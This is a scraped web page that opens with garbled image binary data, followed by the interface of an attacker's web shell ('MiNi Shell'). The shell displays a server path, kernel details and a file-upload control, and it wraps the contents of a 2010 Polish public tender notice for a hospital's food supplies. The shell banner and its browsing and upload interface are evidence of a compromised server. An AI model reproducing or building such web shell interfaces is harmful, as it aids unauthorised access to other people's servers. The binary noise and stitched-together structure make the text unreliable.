JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100408/98634-N-2010.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia jest dostawa artykułów spożywczych, nabiału, warzyw i owoców, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy</b><br>
<b>Numer ogłoszenia: 98634 - 2010; data zamieszczenia: 08.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych, nabiału, warzyw i owoców, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych, nabiału, warzyw i owoców, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ i załącznik do ogłoszenia.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety: 
Pakiet nr 1 - Artykuły spożywcze
Pakiet nr 2 - Nabiał
Pakiet nr 3 - Warzywa i owoce
Pakiet nr 4 - Pieczywo
Pakiet nr 5 - Jaja
Pakiet nr 6 -  Ryby mrożone.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.51.20.00-0, 15.50.00.00-3, 15.51.11.00-4, 15.53.00.00-2, 15.43.11.00-9, 15.54.21.00-0, 15.55.13.00-8, 03.22.10.00-6, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.11-4, 15.81.11.00-7, 15.81.10.00-6, 15.81.00.00-9, 03.14.25.00-3, 15.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 4 do SIWZ.

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca warunki spełnił. Niespełnienie któregoś z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.

Do oferty należy również dołączyć następujące dokumenty:
-	wypełniony formularz ofertowy (załącznik nr 1 do SIWZ),
-	wypełniony formularz asortymentowo-cenowy (załącznik nr 2 do SIWZ)
-	w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
-	oświadczenie, iż  Wykonawca dysponuje środkiem transportu, spełniającym wymagania określone  w Rozporządzeniu Ministra Zdrowia z dnia 19 grudnia 2002 r, w sprawie  wymagań sanitarnych dotyczących środków transportu żywności substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności (Dz.U. z 2003 r nr 21 poz. 179) - (załącznik nr 6 do SIWZ)
-	oświadczenie o spełnianiu wymagań określonych w ustawie  z dnia 11 maja 2001 r. o warunkach  zdrowotnych żywności i żywienia ( DZ.U. Nr 63 poz.634 ze zmianami), w szczególności podleganiu stałemu nadzorowi właściwego miejscowo organu Inspekcji Sanitarnej lub Weterynaryjnej (załącznik nr 7 do SIWZ)
-	oświadczenie, iż zaoferowane artykuły są wyprodukowane zgodnie z Polską Normą (załącznik nr 8 do SIWZ)
-	jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 08:30, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Budyń z cukrem - 1800 szt. - Torebka 60 g
2. Cukier kryształ - 2500 kg  Torebka 1 kg
3. Cukier waniliowy - 200 szt. - Torebka 32 g
4. Herbata granulowana	 - 80 kg - Torebka 100 g
5. Marmolada - 600 szt.	 - Opakowanie 600 g
6. Groszek konserwowy puszka - 400 szt. - Puszka 375 g
7. Kucharek lub produkt równoważny - 360 szt. - Torebka 200 g
8. Kasza jęczmienna - 1000 kg - Torebka 1 kg
9. Kasza manna - 600 kg - Torebka 1 kg
10. Koncentrat pomidorowy 30% duży - 240 szt. - Słoik 900 g
11. Koncentrat pomidorowy 30% mały - 400 szt. - Słoik 165 g
12. Koncentrat barszczu czerwonego w płynie - 300 szt. - Słoik 190 ml
13. Kawa zbożowa - 300 kg - Torebka 500 g
14. Kwasek cytrynowy - 400 szt. - Torebka 30 g
15. Kompot (asortyment: wiśnia, truskawka, czarna porzeczka) - 500 szt. - Słoik 900 ml
16. Kleik ryżowy - 300 szt. - Torebka 180 g
17. Konserwa rybna makrela w pomidorach - 1000 szt. - Puszka 310 g
18. Kisiel z cukrem - 7000 szt. - Torebka 77 g
19. Kapusta czerwona konserwowa 0,9 l - 500 szt. - Słoik 900 g
20. kakao - 120 szt. - Opakowanie 200 g
21. Makaron asortyment (kolanko, nitka, łazanki, świderki) - 1000 kg - Opakowanie 
500 g
22. Mąka pszenna typ 500 - 2000 kg - Torebka 1 kg
23. Mąka ziemniaczana - 200 kg - Torebka 1 kg
24. Musztarda - 120 szt. - Słoik 200 g
25. Masło roślinne - 500 kg - Opakowanie 500 g
26. Majonez - 250 szt. - Słoik 730 g
27. Majonez - 200 szt. - Słoik 260 g
28. Przyprawa w płynie typu Magii - 250 szt. - Butelka 1 l
29. Majeranek - 120 szt. - Torebka 20 g
30. Ocet spirytusowy 10% - 200 szt. - Butelka 0,5 l
31. Ogórek konserwowy - 800 szt. - Słoik 0,9 l
32. Olej - 300 szt. - Butelka 1 l
33. Liść laurowy - 120 szt. - Torebka 20 g
34. Pieprz - 400 szt. - Torebka 20 g
35. Pasztet drobiowy typu Drop - 3700 szt. - Puszka 160 g
36. Płatki owsiane	 - 200 kg - Torebka 500 g
37. Przecier ogórkowy - 400 szt. - Słoik 300 g
38. Ryż - 1100 kg - torebka 1 kg
39. Sól - 800 kg - Torebka 1 kg
40. Sos pieczeniowy - 150 szt. - Torebka 30 g
41. Suchary z cukrem - 600 szt. - Opakowanie 290 g
42. Suchary bez cukru - 100 szt. - Opakowanie 290 g
43. Syrop owocowy (asortyment: wiśniowy, malinowy, żurawinowy) - 1400 szt. - Butelka 490 ml
44. Szczaw konserwowy - 200 szt. - Słoik 300 g
45. Żelatyna - 400 szt. - Torebka 30 g
46. Mrożonka - fasolka szparagowa cięta - 200 szt. - Opakowanie 400 g
47. Mrożonka - szpinak - 500 szt. - Opakowanie 400 g
48. Ziele angielskie - 120 szt. - Torebka 20 g
49. Wafle w czekoladzie - 450 szt. - Karton 36 szt (1szt. =39g)
50. Wafle ryżowe - 5 opakowań - Opakowanie 400g
51. Sok marchwiowo-owocowy - 450 szt. - Zgrzewka 20 szt. (1szt.=300ml)
52. Zupki marchwiowo-ryżowe od 5 miesiąca życia - 80 szt. - Zgrzewka po 6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mleko pasteryzowane 1,5% - 42000 Litrów - Worek foliowy 5l
2. Ser żółty twardy - 150kg - Typu salami, opakowanie 2 kg
3. Ser biały (twaróg półtłusty) - 2700 kg - Pakowany w pergamin po 1 kg
4. Śmietana słodka zawartość tłuszczu 15% - 1200 Litrów - Worek foliowy 0,5 litra
5. Ser topiony - 150kg - Opakowanie zbiorcze 10sztuk x 100g (typ gouda)
6. Jogurty smakowe, wieloowocowe - 3000 Szt. - kubek 125 ml, widoczne kawałki owoców, zawartość tłuszczu 2%
7. Masło typu ekstra - 	1500kg- Kostka 200g sztuka (80-90% tłuszczu)
8. Śmietana kwaśna 12% - 550 Szt. - Kubek 450g 
9. Jogurt naturalny - 400 Szt. - kubek 125ml, zawartość tłuszczu 2%
10. margaryna - 1800 Szt. - Kostka 250g (80% tłuszczu).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.20.00-0, 15.50.00.00-3, 15.51.11.00-4, 15.53.00.00-2, 15.43.11.00-9, 15.54.21.00-0, 15.55.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Burak czerwony - 2400 kg - Worek 10 kg
2. Cebula - 	200 kg - Worek 5 kg
3. Czosnek - 6 kg - Worek 1 kg
4. Fasola Jaś - 140 kg - Woreczek 400 g
5. Jabłka - 1000 kg - Skrzynka 15 kg, jabłko o wadze 100g szt.
6. Kapusta biała - 1600 kg - Worek 25 kg
7. Kapusta czerwona - 400 kg - Worek 25 kg
8. Kapusta kiszona - 500 kg - Woreczek foliowy 1 kg
9. Kalafior - sezon - 600 szt. - Skrzynka 10 szt.
10. Koper - 1200 szt. - Pęczki po 10 szt.
11. Marchew - 8000 kg - Worek 10 kg, płukana, bez śladów piachu i brudu
12. Natka pietruszki - 740 szt. - Pęczek po 10 szt.
13. Ogórek zielony - sezon - 400 kg - Worek 10 kg
14. Ogórek kiszony - 500 kg - Woreczek foliowy 0,5 kg
15. Pietruszka - korzeń - 500 kg - Worek 5 kg, płukana, bez śladów piachu i brudu
16. Pomidor - sezon - 800 kg - Skrzynka 15 kg
17. Rzodkiew biała - 400 kg - Skrzynka 12 kg
18. Seler - 1400 kg - Worek 5 kg, płukany, bez śladów piachu i brudu
19. Sałata - sezon - 700 szt. - Skrzynka 15 szt.
20. Szczypior - 400 szt. - Pęczek po 10 szt.
21. Groch łuskany - 50 kg - Torebka 500 g
22. Pomidor poza sezonem (import) - 500 kg - Skrzynka 15 kg, pomidor okrągły o wadze 100 g za 1 szt.
23. Gruszka - 70 kg - Skrzynka 2 kg
24. Banan - 70 kg - Skrzynka 2 kg
25. Por - 150 kg - Skrzynka 5 kg
26. Brokuły - 250 szt. - Skrzynka 10 szt.
27. Brukselka - 400 kg - Worek po 5 kg
28. Rzodkiewka - 540 pęczków - Pęczek po 10 szt.
29. Pomarańcza - 70 kg - Siatka 2 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.11-4, 03.22.22.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bułka - 2600 szt. - Bułka krojona, opakowanie termiczne pokrywające wyrób, waga 400g, kształt podłużny, wyraźny podział na kromki o jednakowej długości, skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
2. Chleb - 1100 szt. - Chleb krojony, opakowanie termiczne pokrywające wyrób, waga 600g, kształt podłużny, wyraźny podział na kromki o jednakowej długości. Skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
3. Bułka tarta - 170 kg - opakowanie 0,5 kg. Barwa od szarokremowej do złocistej, postać sypka bez grudek, zapach swoisty bez obcych zapachów, smak charakterystyczny dla suszonego pieczywa bez obcych posmaków, wilgotność nie więcej niż 10%, zawartość cukru w suchej masie nie więcej niż 5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.81.10.00-6, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajko - 35 000 szt. - Rozmiar M 53-63 g. Pakowane w wytłaczanki po 10 szt. Klasa 1A. szczegółowe znakowanie opakowania zbiorczego (data ważności, klasa wagowa, rozmiar). Pojedyncze sztuki oznakowane pieczątką producenta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Ryby mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona panga - filet - 600 kg - Tafla 7 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com